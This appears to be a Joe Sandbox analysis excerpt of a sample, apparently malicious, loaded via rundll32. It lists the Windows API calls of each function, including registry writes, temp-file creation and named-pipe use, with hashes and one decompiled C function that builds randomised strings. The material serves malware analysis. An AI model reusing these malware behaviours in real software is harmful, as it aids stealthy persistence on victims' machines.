                                • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                • String ID:
                                • API String ID: 3635185113-0
                                • Opcode ID: 59ec1cfae7903a835b3cb91636f161e870d192b832599a4ccb765cb5448f604a
                                • Instruction ID: 719fcf8bf10666470fcbc706870c50856c34b59e254f2ec2cb0dbe69199bd7cc
                                • Opcode Fuzzy Hash: 59ec1cfae7903a835b3cb91636f161e870d192b832599a4ccb765cb5448f604a
                                • Instruction Fuzzy Hash: E021C532500205BFD722BF249C85E7FBBECEF97A45F21045FF505AA111CB60980686A9
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                  • Part of subcall function 03477A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 03477AA6
                                  • Part of subcall function 03477A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03477ABE
                                  • Part of subcall function 03477A61: WaitForSingleObject.KERNEL32(00000000,?,034887CC,?,?), ref: 03477B86
                                  • Part of subcall function 03477A61: HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BAF
                                  • Part of subcall function 03477A61: HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BBF
                                  • Part of subcall function 03477A61: RegCloseKey.ADVAPI32(?,?,034887CC,?,?), ref: 03477BC8
                                • lstrcmp.KERNEL32(?,00000000), ref: 0348E211
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0347399C,00000000,00000000), ref: 0348E23D
                                • GetCurrentThreadId.KERNEL32 ref: 0348E2EE
                                • GetCurrentThread.KERNEL32 ref: 0348E2FF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,0347399C,00000001,76CDF730,00000000,00000000), ref: 0348E33C
                                • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,0347399C,00000001,76CDF730,00000000,00000000), ref: 0348E350
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0348E35E
                                • wsprintfA.USER32 ref: 0348E376
                                  • Part of subcall function 03473263: lstrlen.KERNEL32(?,00000000,03493716,00000000,03482466,?,?,?,03488A07,?,?,?,00000000,00000001,00000000,?), ref: 0347326D
                                  • Part of subcall function 03473263: lstrcpy.KERNEL32(00000000,?), ref: 03473291
                                  • Part of subcall function 03473263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,03488A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 03473298
                                  • Part of subcall function 03473263: lstrcat.KERNEL32(00000000,?), ref: 034732EF
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0348E381
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0348E398
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348E3A9
                                • HeapFree.KERNEL32(00000000,?), ref: 0348E3B5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                • String ID:
                                • API String ID: 773763258-0
                                • Opcode ID: 98c5eb3e686b86a330bc0f44a88f718b65873325d72768458db57fb490f6fa94
                                • Instruction ID: 5a3ad6203341adaefb04acb61aead86057b965632f7211a23673365e8ca3d05f
                                • Opcode Fuzzy Hash: 98c5eb3e686b86a330bc0f44a88f718b65873325d72768458db57fb490f6fa94
                                • Instruction Fuzzy Hash: E2712375900219EFDB11EFA5D885DEEBBF9FF09310F04406AE604BB220D730AA85DB94
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03475226
                                • memcpy.NTDLL(?,?,00000010), ref: 03475249
                                • memset.NTDLL ref: 03475295
                                • lstrcpyn.KERNEL32(?,?,00000034), ref: 034752A9
                                • GetLastError.KERNEL32 ref: 034752D7
                                • GetLastError.KERNEL32 ref: 0347531E
                                • GetLastError.KERNEL32 ref: 0347533D
                                • WaitForSingleObject.KERNEL32(?,000927C0), ref: 03475377
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03475385
                                • GetLastError.KERNEL32 ref: 03475408
                                • ReleaseMutex.KERNEL32(?), ref: 0347541A
                                • RtlExitUserThread.NTDLL(?), ref: 03475430
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                • String ID:
                                • API String ID: 4037736292-0
                                • Opcode ID: 5ea3045d65218a1c2ae65653524a14b5a0d73224c84b76d48aa8f84e1eb0646f
                                • Instruction ID: ba795cc449fd5216c81784fef4f08449abe5584095760d9c226772717a66b4ea
                                • Opcode Fuzzy Hash: 5ea3045d65218a1c2ae65653524a14b5a0d73224c84b76d48aa8f84e1eb0646f
                                • Instruction Fuzzy Hash: 48618A71504300AFD721EF269848AABB7E8FF86710F148A5FF5969E290E7B0E4058B56
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0347DA0C
                                • lstrlen.KERNEL32(?), ref: 0347DA14
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347DA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347DA43
                                • lstrlen.KERNEL32(?), ref: 0347DA58
                                • lstrlen.KERNEL32(?), ref: 0347DA66
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0347DAB4
                                • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0347DAD8
                                • lstrlen.KERNEL32(?), ref: 0347DB0B
                                • HeapFree.KERNEL32(00000000,?,?), ref: 0347DB36
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0347DB4D
                                • HeapFree.KERNEL32(00000000,?,?), ref: 0347DB5A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                • String ID:
                                • API String ID: 904523553-0
                                • Opcode ID: f7adb887aec339cb9c55313386e059971b625817eceb3eb98a16b01f3f42bbb8
                                • Instruction ID: 3c7cb935ddb4e52490466bfb66656098cacf3d62eda2cb6b282afb0fb667a804
                                • Opcode Fuzzy Hash: f7adb887aec339cb9c55313386e059971b625817eceb3eb98a16b01f3f42bbb8
                                • Instruction Fuzzy Hash: 50418A32910249FFCF12DFA5CC44AAEBBB9FF46310F188466F915AB250D730A911DBA4
                                 Uniqueness
                                 • Uniqueness Score: -1.00%
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0348201B
                                • WaitForSingleObject.KERNEL32(000005BC,00000000), ref: 0348203D
                                • ConnectNamedPipe.KERNEL32(?,?), ref: 0348205D
                                • GetLastError.KERNEL32 ref: 03482067
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0348208B
                                • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 034820CE
                                • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 034820D7
                                • WaitForSingleObject.KERNEL32(00000000), ref: 034820E0
                                • CloseHandle.KERNEL32(?), ref: 034820F5
                                • GetLastError.KERNEL32 ref: 03482102
                                • CloseHandle.KERNEL32(?), ref: 0348210F
                                • RtlExitUserThread.NTDLL(000000FF), ref: 03482125
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                • String ID:
                                • API String ID: 4053378866-0
                                • Opcode ID: 19eb3de61c367a2dd1a405630053d079e291eb84043f51a61073a43da4b1c034
                                • Instruction ID: 8b440cd1077b47a8482d294b777ad6a8e21d98af5bad018ffa8685fd8a2c04e6
                                • Opcode Fuzzy Hash: 19eb3de61c367a2dd1a405630053d079e291eb84043f51a61073a43da4b1c034
                                • Instruction Fuzzy Hash: 8B319F70404305AFE711EF24CC4996FBBE9FB46314F204E2BFA65AA1A0D7709945CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlImageNtHeader.NTDLL(?), ref: 03484151
                                • GetTempPathA.KERNEL32(00000000,00000000,?,?,034809CF,00000094,00000000,00000000,?), ref: 03484169
                                • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 03484178
                                • GetTempPathA.KERNEL32(00000001,00000000,?,?,034809CF,00000094,00000000,00000000,?), ref: 0348418B
                                • GetTickCount.KERNEL32 ref: 0348418F
                                • wsprintfA.USER32 ref: 034841A6
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034841E1
                                • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 03484201
                                • lstrlen.KERNEL32(00000000), ref: 0348420B
                                • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0348421B
                                • RegCloseKey.ADVAPI32(?), ref: 03484227
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 03484235
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                • String ID:
                                • API String ID: 3778301466-0
                                • Opcode ID: 4915779e5dba66e3eb683747748ae45f576569aa73387118b2f4e98c44c80928
                                • Instruction ID: fc9b96f1803f4f8b38ccef39d02d21bad62f47d2e88dd80a075034fe19ec8850
                                • Opcode Fuzzy Hash: 4915779e5dba66e3eb683747748ae45f576569aa73387118b2f4e98c44c80928
                                • Instruction Fuzzy Hash: 213167B1400219BFDB11AFA5EC88DAF7BECEF56395B154166F905EF200D7348A11DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlImageNtHeader.NTDLL(00000000), ref: 034750BD
                                • GetCurrentThreadId.KERNEL32 ref: 034750D3
                                • GetCurrentThread.KERNEL32 ref: 034750E4
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                  • Part of subcall function 03490551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0347512E,00000020,00000000,?,00000000), ref: 034905BC
                                  • Part of subcall function 03490551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0347512E,00000020,00000000,?,00000000), ref: 034905E4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0347515E
                                • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0347516A
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 034751B9
                                • wsprintfA.USER32 ref: 034751D1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 034751DC
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 034751F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                • String ID: W
                                • API String ID: 630447368-655174618
                                • Opcode ID: 604f9741151c7458afc870853f1160c7399f329026e113426670bfbc162a977d
                                • Instruction ID: c5c8b44485d222da439a507c09e705d1f4bb078d0333221cf85c758ccce6ad36
                                • Opcode Fuzzy Hash: 604f9741151c7458afc870853f1160c7399f329026e113426670bfbc162a977d
                                • Instruction Fuzzy Hash: 10414774900218AFDB12EFA1DC449AFBFB8FF4A641B14406BF904EE214D7349A50DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0348B82F
                                  • Part of subcall function 0348447B: RegCloseKey.ADVAPI32(?,?), ref: 03484502
                                • RegOpenKeyA.ADVAPI32(80000001,03484833,?), ref: 0348B86A
                                • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 0348B8CC
                                • lstrcatW.KERNEL32(00000000,?), ref: 0348B8E1
                                • lstrcpyW.KERNEL32(?), ref: 0348B8FB
                                • lstrcatW.KERNEL32(00000000,?), ref: 0348B90A
                                  • Part of subcall function 0348452B: lstrlenW.KERNEL32(?,?,?,0347E51D,?,?,?,?,00001000,?,?,00001000), ref: 0348453E
                                  • Part of subcall function 0348452B: lstrlen.KERNEL32(?,?,0347E51D,?,?,?,?,00001000,?,?,00001000), ref: 03484549
                                  • Part of subcall function 0348452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0348455E
                                • RegCloseKey.ADVAPI32(03484833,?,?,03484833), ref: 0348B974
                                  • Part of subcall function 0347C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0347171E,?,?,00000000,?), ref: 0347C2B6
                                  • Part of subcall function 0347C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0347171E,?,?,00000000,?), ref: 0347C2DE
                                  • Part of subcall function 0347C2AA: memset.NTDLL ref: 0347C2F0
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,03484833), ref: 0348B9A9
                                • GetLastError.KERNEL32(?,?,03484833), ref: 0348B9B4
                                • HeapFree.KERNEL32(00000000,00000000,?,?,03484833), ref: 0348B9CA
                                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,03484833), ref: 0348B9DC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                • String ID:
                                • API String ID: 1430934453-0
                                • Opcode ID: f4bd2ddbbc06bb507e0e7202ef3550d131c0067e81d7dd4f5cd6d16bc3d80746
                                • Instruction ID: e0fad12d05478ff2b39764898e72853f9ef1c30a3848f51b464841d8d0244bf2
                                • Opcode Fuzzy Hash: f4bd2ddbbc06bb507e0e7202ef3550d131c0067e81d7dd4f5cd6d16bc3d80746
                                • Instruction Fuzzy Hash: 96515975900219EFDB11FFA5DC84EAE7BF9EF19300B14055BE900AF214E7309A069BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 55%
                                			E034362F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				char _v20;
                                				WCHAR* _v24;
                                				signed int _v28;
                                				intOrPtr _v32;
                                				void* __edi;
                                				void* __esi;
                                				WCHAR* _t58;
                                				signed int _t60;
                                				signed int _t62;
                                				intOrPtr _t64;
                                				intOrPtr _t66;
                                				intOrPtr _t70;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                				WCHAR* _t80;
                                				WCHAR* _t83;
                                				void* _t84;
                                				void* _t85;
                                				void* _t86;
                                				intOrPtr _t92;
                                				signed int _t103;
                                				void* _t104;
                                				intOrPtr _t105;
                                				void* _t107;
                                				intOrPtr* _t115;
                                				void* _t119;
                                				WCHAR* _t125;
                                
                                				_t58 =  *0x343a3dc; // 0x55e9c18
                                				_v24 = _t58;
                                				_v28 = 8;
                                				_v20 = GetTickCount();
                                				_t60 = E03437367();
                                				_t103 = 5;
                                				_t98 = _t60 % _t103 + 6;
                                				_t62 = E03437367();
                                				_t117 = _t62 % _t103 + 6;
                                				_v32 = _t62 % _t103 + 6;
                                				_t64 = E0343117A(_t60 % _t103 + 6);
                                				_v16 = _t64;
                                				if(_t64 != 0) {
                                					_t66 = E0343117A(_t117);
                                					_v12 = _t66;
                                					if(_t66 != 0) {
                                						_push(5);
                                						_t104 = 0xa;
                                						_t119 = E034367E7(_t104,  &_v20);
                                						if(_t119 == 0) {
                                							_t119 = 0x343918c;
                                						}
                                						_t70 = E0343659E(_v24);
                                						_v8 = _t70;
                                						if(_t70 != 0) {
                                							_t115 = __imp__;
                                							_t72 =  *_t115(_t119);
                                							_t75 =  *_t115(_v8);
                                							_t76 =  *_t115(_a4);
                                							_t80 = E03436D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                                							_v24 = _t80;
                                							if(_t80 != 0) {
                                								_t105 =  *0x343a348; // 0x21ad5a8
                                								_t28 = _t105 + 0x343bb30; // 0x530025
                                								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                								_push(4);
                                								_t107 = 5;
                                								_t83 = E034367E7(_t107,  &_v20);
                                								_a8 = _t83;
                                								if(_t83 == 0) {
                                									_a8 = 0x3439190;
                                								}
                                								_t84 =  *_t115(_a8);
                                								_t85 =  *_t115(_v8);
                                								_t86 =  *_t115(_a4);
                                								_t125 = E03436D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                								if(_t125 == 0) {
                                									E03436C2C(_v24);
                                								} else {
                                									_t92 =  *0x343a348; // 0x21ad5a8
                                									_t44 = _t92 + 0x343bca8; // 0x73006d
                                									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                									 *_a16 = _v24;
                                									_v28 = _v28 & 0x00000000;
                                									 *_a20 = _t125;
                                								}
                                							}
                                							E03436C2C(_v8);
                                						}
                                						E03436C2C(_v12);
                                					}
                                					E03436C2C(_v16);
                                				}
                                				return _v28;
                                			}


                                APIs
                                • GetTickCount.KERNEL32 ref: 0343630E
                                • lstrlen.KERNEL32(00000000,00000005), ref: 0343638F
                                • lstrlen.KERNEL32(?), ref: 034363A0
                                • lstrlen.KERNEL32(00000000), ref: 034363A7
                                • lstrlenW.KERNEL32(80000002), ref: 034363AE
                                • wsprintfW.USER32 ref: 034363F4
                                • lstrlen.KERNEL32(?,00000004), ref: 03436417
                                • lstrlen.KERNEL32(?), ref: 03436420
                                • lstrlen.KERNEL32(?), ref: 03436427
                                • lstrlenW.KERNEL32(?), ref: 0343642E
                                • wsprintfW.USER32 ref: 03436465
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                • String ID:
                                • API String ID: 822878831-0
                                • Opcode ID: a79cb013d3be4c416c0209c798a5019db278f4d5c72ac42142db8d8237c265dc
                                • Instruction ID: ffa937610e5ac52a7762c6deb4d86a7c93c8d55119e04801acdeece331b4b94c
                                • Opcode Fuzzy Hash: a79cb013d3be4c416c0209c798a5019db278f4d5c72ac42142db8d8237c265dc
                                • Instruction Fuzzy Hash: B4515D76D0021ABFCF11EFA5DC84ADE7BB5EF49314F064066E904AF210DB358A11DB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 03485389
                                • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0348539E
                                • RegCreateKeyA.ADVAPI32(80000001,?), ref: 034853C6
                                • HeapFree.KERNEL32(00000000,?), ref: 03485407
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03485417
                                • RtlAllocateHeap.NTDLL(00000000,0347DA9D), ref: 0348542A
                                • RtlAllocateHeap.NTDLL(00000000,0347DA9D), ref: 03485439
                                • HeapFree.KERNEL32(00000000,00000000,?,0347DA9D,00000000,?,?,?), ref: 03485483
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0347DA9D,00000000,?,?,?,?), ref: 034854A7
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0347DA9D,00000000,?,?,?), ref: 034854CC
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0347DA9D,00000000,?,?,?), ref: 034854E1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Allocate$CloseCreate
                                • String ID:
                                • API String ID: 4126010716-0
                                • Opcode ID: ab20af7607ab834c057165506cd154e670bcaf7dbffbd575dac50b7cdca018c1
                                • Instruction ID: 326524a2bad65e31cb6e0a5cc33e60056e4d61f38914bf23546ccbd7f661619b
                                • Opcode Fuzzy Hash: ab20af7607ab834c057165506cd154e670bcaf7dbffbd575dac50b7cdca018c1
                                • Instruction Fuzzy Hash: 8051D1B5C00209EFDF01EF95D8849EEBBB9FF09351F1444AAE905BA220D3358A94DF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFindFileNameW.SHLWAPI(?), ref: 0347CEDD
                                • PathFindFileNameW.SHLWAPI(?), ref: 0347CEF3
                                • lstrlenW.KERNEL32(00000000), ref: 0347CF36
                                • RtlAllocateHeap.NTDLL(00000000,0349350B), ref: 0347CF4C
                                • memcpy.NTDLL(00000000,00000000,03493509), ref: 0347CF5F
                                • _wcsupr.NTDLL ref: 0347CF6B
                                • lstrlenW.KERNEL32(?,03493509), ref: 0347CFA4
                                • RtlAllocateHeap.NTDLL(00000000,?,03493509), ref: 0347CFB9
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0347CFCF
                                • lstrcatW.KERNEL32(00000000,?), ref: 0347CFF5
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347D004
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                • String ID:
                                • API String ID: 3868788785-0
                                • Opcode ID: cd39e5be2cbfd53f8a8011da33f15640f2ff28c1e94d58418cda7936a6cad47f
                                • Instruction ID: d187414d47095eb387f59fb80597c113f8b2e4f23ba94d7dc2484f17b06f10b5
                                • Opcode Fuzzy Hash: cd39e5be2cbfd53f8a8011da33f15640f2ff28c1e94d58418cda7936a6cad47f
                                • Instruction Fuzzy Hash: 20311A32510214AFC721EF74DCC89AFBBE8EF56210B29051BF911EF289DB319C068B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0347163E
                                  • Part of subcall function 0348447B: RegCloseKey.ADVAPI32(?,?), ref: 03484502
                                • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 0347166D
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 0347167E
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034716B8
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 034716DA
                                • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 034716E3
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 034716F9
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0347170E
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 03471722
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 03471737
                                • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 03471740
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                • String ID:
                                • API String ID: 534682438-0
                                • Opcode ID: 79c694e460f498b8a7b4a37810978899bcc7b0e81d494a6d1afcedd297c620e8
                                • Instruction ID: 3bc1326823718771c6bf3204a7f415a4713fbb4f53fc9aedbb93936f1100909c
                                • Opcode Fuzzy Hash: 79c694e460f498b8a7b4a37810978899bcc7b0e81d494a6d1afcedd297c620e8
                                • Instruction Fuzzy Hash: 90314975500108BFCB12EFA9DC89CEE7BFDFB59340B184156F905EA124E3328A45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 034833E4
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094), ref: 034833F6
                                • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094), ref: 03483403
                                • wsprintfA.USER32 ref: 0348341E
                                • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0347C1F8,00000000,00000094,00000000), ref: 03483434
                                • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0348344D
                                • WriteFile.KERNEL32(00000000,00000000), ref: 03483455
                                • GetLastError.KERNEL32 ref: 03483463
                                • CloseHandle.KERNEL32(00000000), ref: 0348346C
                                • GetLastError.KERNEL32(?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094,00000000), ref: 0348347D
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094), ref: 0348348D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                • String ID:
                                • API String ID: 3873609385-0
                                • Opcode ID: de73218b89ec11f4a764c03420e143d22f53981409e06672baf89c24d9b0a330
                                • Instruction ID: 0e3d2bf192b8aaaf968529573cddafffb040df9b7b0e25a47a16c827a9733910
                                • Opcode Fuzzy Hash: de73218b89ec11f4a764c03420e143d22f53981409e06672baf89c24d9b0a330
                                • Instruction Fuzzy Hash: 581105791012187FE2127F25AC8CE7F3BDCEB17A65B15016BF906EA144DB504C0986B4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
